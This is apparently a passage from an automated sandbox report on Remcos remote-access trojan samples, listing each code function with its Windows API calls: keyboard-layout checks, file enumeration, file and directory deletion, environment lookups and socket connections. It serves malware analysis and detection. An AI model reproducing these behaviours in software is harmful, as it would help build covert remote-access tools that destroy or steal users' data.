                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$b